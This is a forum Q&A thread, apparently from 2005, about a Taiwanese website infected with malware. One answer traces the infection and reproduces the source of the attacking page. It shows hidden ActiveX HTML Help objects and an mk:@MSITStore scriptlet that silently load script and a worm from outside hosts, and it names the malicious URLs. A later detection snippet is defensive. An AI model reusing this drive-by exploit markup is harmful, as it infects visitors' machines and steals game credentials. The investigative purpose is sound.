
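Why is the home page infected?

Every page on the site http://www.map.com.tw is infected. Did the company put it there themselves? Or do they have no idea at all? Amazing!!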

Update:

If you do not have Kaspersky antivirus installed, do not try visiting it casually; you will get infected!

Update 2:

It really is infected, with two of them:

Exploit.VBS.Phel.c

Trojan-PSW.Win32.Gamania.a <~~ probably a trojan for Lineage (天堂)

I tried it; even Norton cannot find it! So far I know that Kaspersky and McAfee can detect it.

Update 3:

Trojan-PSW.Win32.Gamania.a is Kaspersky's name for the virus.

It was found in bbs003302.css; that file is a bit over 70 KB.

4 Answers

  • 2 decades ago
    Favorite Answer

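    Heh, interesting stuff.....

    I did not get a hit for Trojan-PSW.Win32.Gamania.a... (I use F-Secure 5.52)

    As for Exploit.VBS.Phel.c..

    http://www.map.com.tw/ is infected.. tracing...

    http://www.map.com.tw/default.asp is also infected, tracing further..

    http://www.szadk.com/new.htm <== also infected. This link is placed in default.asp, as the first entry, "隨意測字" (casual character divination), in the "more merchants" display on the left. Source of new.htm: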

    ====================

    <meta http-equiv="Pragma" contect="no-cache">

    <SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>

    <SCRIPT language=VScript src="bbs003302.css"></SCRIPT>

    <HTML>

    <BODY>

    <div style="display:none">

    <OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

    <PARAM name="Command" value="Related Topics, MENU">

    <PARAM name="Window" value="$global_ifl">

    <PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'>

    </OBJECT>

    <OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">

    <PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">

    <PARAM name="Item1" value='command;javascript:eval("document.write(\"<SCRIPT language=JScript src=\\\"http://www.twavgirl.com/count/bbs003302.gif///%22/...

    </OBJECT>

    </div>

    <SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>

    </BODY>

    </HTML>

    =======================

    Going in, the page is blank... and the home page has nothing on it either, a very suspicious spot...

    <PARAM name="Item1" value='command;file://C:\WINDOWS\Help\apps.chm'>

    This bit is probably the culprit...

    Also found that http://www.twavgirl.com/count/bbs003302.gif is a dead link..

    http://www.twavgirl.com/ shows the same thing...

    http://www.twavgirl.com/count/count.htm has it too.. but it links back to

    http://www.szadk.com/new.htm

    Next.. source of http://www.twavgirl.com/reg/reg.htm ...

    =========================

    <script>var tc_user="szadk";var tc_class="18";</script><script src="http://stat.t2t2.com/stat.js"></script>

    <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.twavgirl.com/reg/msn.txt::/%23%2E%68%74...

    ==========================

    http://www.twavgirl.com/reg/msn.txt 37.1 KB (37,992 bytes) contains Net-Worm.Win32.Zorin.a..

    <OBJECT Width=0 Height=0 style="display:none;" type="text/x-scriptlet" data="mk:@MSITStore:mhtml:c:\.mht!http://www.twavgirl.com/reg/msn.txt::/%23%2E%68%74...

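    This bit is probably the culprit...

    Sorry, this is all my skills let me play with for now... posting it for others' reference... will keep looking into it... to be continued..

    Addendum, 2005-02-19 13:44:12:

    http://www.szadk.com/bbs003302.css <== the file header is MZP, a standard executable header... UPX-packed; F-Secure also detects it as Trojan-PSW.Win32.Gamania.a .. but from what I have seen so far, basically if you have updated Windows to the latest, it should not be able to get implanted successfully... In short, the problem should lie with the http://www.szadk.com/ website

    PS: The contents of http://www.szadk.com/bbs003302.gif are a pile of what looks like encrypted code.. the only thing that is certain is that it is definitely not a standard GIF file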
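
The answer above observes that bbs003302.css begins with an MZP executable header and is UPX-packed, and that bbs003302.gif is not a standard GIF. The Python sketch below is an added example, not part of the original thread: it flags files whose leading bytes contradict their extension. The function names, the extension list and the header-only sample bytes are constructed for illustration.

```python
import struct

EXECUTABLE_EXTS = {"exe", "dll", "sys", "scr", "ocx"}  # assumed allow-list

def sniff(data: bytes) -> str:
    """Classify content by its leading bytes, ignoring the file name."""
    if data[:6] in (b"GIF87a", b"GIF89a"):
        return "gif"
    if data[:2] == b"MZ" and len(data) >= 0x40:
        (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
        return "pe" if data[e_lfanew:e_lfanew + 4] == b"PE\0\0" else "mz"
    return "unknown"

def pe_section_names(data: bytes) -> list:
    """Read section names from the PE section table (empty if truncated)."""
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if len(data) < e_lfanew + 24:
        return []
    (count,) = struct.unpack_from("<H", data, e_lfanew + 6)      # NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)  # SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size
    names = []
    for i in range(count):
        raw = data[table + 40 * i: table + 40 * i + 8]
        if len(raw) < 8:
            break
        names.append(raw.rstrip(b"\0").decode("latin-1"))
    return names

def check(name: str, data: bytes) -> list:
    """Return findings where the content contradicts the file extension."""
    ext = name.rsplit(".", 1)[-1].lower()
    kind = sniff(data)
    findings = []
    if kind in ("pe", "mz") and ext not in EXECUTABLE_EXTS:
        findings.append("executable header in .%s file" % ext)
        if kind == "pe" and any(n.startswith("UPX") for n in pe_section_names(data)):
            findings.append("UPX section names (packed)")
    elif ext == "gif" and kind != "gif":
        findings.append("no GIF signature in .gif file")
    return findings

def sample_pe(sections) -> bytes:
    """Constructed header-only PE stub for the demo; not a real sample."""
    dos = b"MZP\0" + b"\0" * 0x38 + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    return dos + coff + b"".join(s.ljust(8, b"\0") + b"\0" * 32 for s in sections)

if __name__ == "__main__":
    print(check("bbs003302.css", sample_pe([b"UPX0", b"UPX1"])))
    print(check("bbs003302.gif", b"constructed non-GIF text"))
```
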

  • Anonymous
    2 decades ago

    Yeah!! You should warn people before posting the URL = ="

  • 2 decades ago

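    It's probably not infected; maybe the antivirus software has a problem... I have two antivirus products installed and neither found anything, and just visiting a web page on its own is not very likely to infect you...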

  • Anonymous
    2 decades ago

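    I don't know the answer, but I want to say this! If it is infected you should state that right at the top; what if someone goes in by accident =  =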
